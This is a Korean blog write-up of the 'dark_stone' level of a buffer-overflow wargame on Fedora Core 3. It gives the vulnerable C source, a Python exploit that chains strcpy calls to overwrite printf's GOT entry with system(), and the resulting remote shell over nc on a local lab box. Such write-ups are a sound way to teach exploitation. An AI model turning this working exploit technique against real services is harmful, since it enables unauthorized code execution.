windowhan lab

문제의 소스입니다.

[evil_wizard@Fedora_1stFloor tmp]$ cat ../dark_stone.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - dark_stone
 - Remote BOF on Fedora Core 3
 - hint : GOT overwriting again
 - port : TCP 8888
*/

#include <stdio.h>

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main()
{
 char buffer[256];
 char saved_sfp[4];
 int length;
 char temp[1024];

 printf("dark_stone : how fresh meat you are!\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);

 // for disturbance RET sleding
 length = strlen(temp);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 // buffer cleaning
 memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

 printf("%s\n", buffer);
}

저번 문제와 똑같은 문제지만 저번 문제와 이번문제의 차이는 저번 문제는 local 환경이었고, 이번 문제는 remote환경 이라는 것입니다.

문제 - 4 : http://windowhan.tistory.com/entry/hellfire-evilwizard (저번 문제와 똑같이 풀었습니다.)

제가 쓴 소스입니다.

[evil_wizard@Fedora_1stFloor tmp]$ cat ex.py
#!/usr/bin/python
from struct import pack
import os

printf_plt = 0x08048408
printf_got = 0x0804984c
strcpy_plt = 0x08048438

garget1 = 0x08048484 #0xc0
garget2 = 0x0804838c #0x07
garget3 = 0x080482b4 #0x75
garget4 = 0x0804982c #0x00

b_garget1 = 0x0804872d #h
b_garget2 = 0x08048287 #s
b_garget3 = 0x08048114 #/
b_garget4 = 0x08048720 #n
b_garget5 = 0x0804811d #i
b_garget6 = 0x08048117 #b
b_garget7 = 0x08048114 #/
b_garget8 = 0x0804982c #\x00

func_stack = 0x08049874 #system function address
binsh_stack = 0x8049980 #/bin/sh address
final_binsh_stack = 0x08049ad0
ppr = 0x080484f3 #pop;pop;ret
binsh = 0x00833603 #"/bin/sh"

p = lambda x : pack("<L",x)

payload = ""
payload += "\x90"*268
payload += p(strcpy_plt) + p(ppr) + p(func_stack+0) + p(garget1)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+1) + p(garget2)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+2) + p(garget3)
payload += p(strcpy_plt) + p(ppr) + p(func_stack+3) + p(garget4)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+4) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+5) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+6) + p(b_garget8)
#payload += p(strcpy_plt) + p(ppr) + p(func_stack+7) + p(b_garget8)
payload += p(strcpy_plt) + p(ppr) + p(printf_got) + p(func_stack)

payload += p(printf_plt) + "\x90"*4 + p(binsh)

print payload

=========================================================================

[evil_wizard@Fedora_1stFloor tmp]$ (python ex.py;cat)|nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-ps^Hass
/bin/sh: line 3: my-pass: command not found
my-pass
euid = 505
let there be light

==========================================================================

[dark_stone@Fedora_1stFloor ~]$ ls
dropped_item.txt
[dark_stone@Fedora_1stFloor ~]$ cat dropped_item.txt
                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

==================================================================

07을 찾아야했는데 00을 찾아서 넣어주고 있었네요...

원래 system 함수의 주소는 0x7507c0 인데 0x7500c0으로 넣어서 엉뚱한곳을 실행시키고있었다는..하하..-_-;;

보스몹이 쥐고있던 아이템을 획득했습니다 ㅋㅋ

문제의 소스입니다.